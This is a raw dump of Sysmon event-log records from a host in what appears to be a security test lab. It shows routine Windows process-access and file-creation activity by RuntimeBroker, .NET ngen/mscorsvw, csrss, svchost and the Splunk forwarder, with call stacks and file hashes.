21:06:57.311{4DB9351A-9F2B-60D3-C400-00000000CF01}7765472C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022578Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.311{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022577Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.311{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 23542300x800000000000000022576Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.311{4DB9351A-A270-60D3-2805-00000000CF01}3576NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NGK1WE7RF0\PresentationFramework.ni.dll.auxMD5=9698D88DF62A2F2125D6F64560EC769F,SHA256=1F8D46B23466A8AC82CAF22CE0838969C6DBC69384EF602F17C6025E336A92CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022575Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.311{4DB9351A-A270-60D3-2805-00000000CF01}3576NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NGK1WE7RF0\PresentationFramework.ni.dllMD5=5E1892AF357AB943BC6913F19841D87F,SHA256=3E637F715EF9A620EC80D218E9DE663727B4355851FF82E9BE8CC16EAAA5470E,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022574Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.093{4DB9351A-A270-60D3-2905-00000000CF01}57566136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022716Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.883{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A272-60D3-3805-00000000CF01}6792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022715Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.852{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A272-60D3-3805-00000000CF01}6792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022714Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.852{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A272-60D3-3805-00000000CF01}6792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022713Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.852{4DB9351A-A272-60D3-3705-00000000CF01}6692NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3RWVBZFV6M\Microsoft.BestPractices.ni.dll.auxMD5=9665C4B54437F0E358E2B5D860F2DC5C,SHA256=2A735981592901858ECE3FDA9A23978E322F417430F5F4EABAC9DEFE5E2B0751,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022712Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.852{4DB9351A-A272-60D3-3705-00000000CF01}6692NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3RWVBZFV6M\Microsoft.BestPractices.ni.dllMD5=2D344A5B30C2FBFD57588BE82826A5AF,SHA256=DD1AC0F0B99D6B4FC53BA67A86E5097053D7040725477DFFAAB59A2A0F2A8D46,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000022711Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.758{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=604BC8CD672E78DE996CEA695DCCE558,SHA256=C8A3BBE89483D7DA148ACA0B7524FC12671B616E07C5AE8DA300C36486D82FC1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022710Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.743{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A272-60D3-3705-00000000CF01}6692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022709Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.722{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A272-60D3-3705-00000000CF01}6692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022708Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.722{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A272-60D3-3705-00000000CF01}6692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022707Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.717{4DB9351A-A272-60D3-3605-00000000CF01}4152NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2NOISH4861\Microsoft.ApplicationId.RuleWizard.ni.dll.auxMD5=660D744EC5E32731E154374C7F7425FC,SHA256=3E628A8D6DDB8F4D794676E4BA9F748EEBB698563C01A72AE37DDE3237A0AC2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022706Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.716{4DB9351A-A272-60D3-3605-00000000CF01}4152NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2NOISH4861\Microsoft.ApplicationId.RuleWizard.ni.dllMD5=E673B81C0FA2759B91B2FEEA06CD53D2,SHA256=0BF3004712463A6D74DF5C79B85656EE6B67798262E6876E16D39305815B7F2A,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022705Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.674{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A272-60D3-3605-00000000CF01}4152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022704Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.658{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A272-60D3-3605-00000000CF01}4152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022703Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.658{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A272-60D3-3605-00000000CF01}4152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022702Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.658{4DB9351A-A272-60D3-3505-00000000CF01}5720NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\C5B77TFWWT\Microsoft.ApplicationId.Framework.ni.dll.auxMD5=607CAF16AC2A0434C9B4ECB917E6A1A8,SHA256=FD1C2395A41687BB9F34446247C6835E4ADD177A5DD6557DB5ABF2853EA29C9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022701Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.658{4DB9351A-A272-60D3-3505-00000000CF01}5720NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\C5B77TFWWT\Microsoft.ApplicationId.Framework.ni.dllMD5=64DC6B57047BFCDA52CDACD05C6D9439,SHA256=DD284C6931598E7A4326568388096A58CAB55A6F87D2785107677DF3D345493A,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022700Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.627{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A272-60D3-3505-00000000CF01}5720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022699Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.611{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A272-60D3-3505-00000000CF01}5720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022698Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.611{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A272-60D3-3505-00000000CF01}5720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022697Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.611{4DB9351A-A272-60D3-3405-00000000CF01}5096NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\20BRH0HLAR\Microsoft.Activities.Build.ni.dll.auxMD5=181694864774E61401FEE86F3F04C5E0,SHA256=ED7074DF4F5FD040835AE05690188ABE257393A3575A2FB595512161E0CBAA10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022696Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.611{4DB9351A-A272-60D3-3405-00000000CF01}5096NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\20BRH0HLAR\Microsoft.Activities.Build.ni.dllMD5=295A05B60553EFEDA99066CCF83902C6,SHA256=5C16A4A5E49F5E6CD63FC3FD88A4D57F7FEAD32624DFF913745AFEF70063D7AC,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022695Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.580{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A272-60D3-3405-00000000CF01}5096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022694Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.533{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A272-60D3-3405-00000000CF01}5096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022693Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 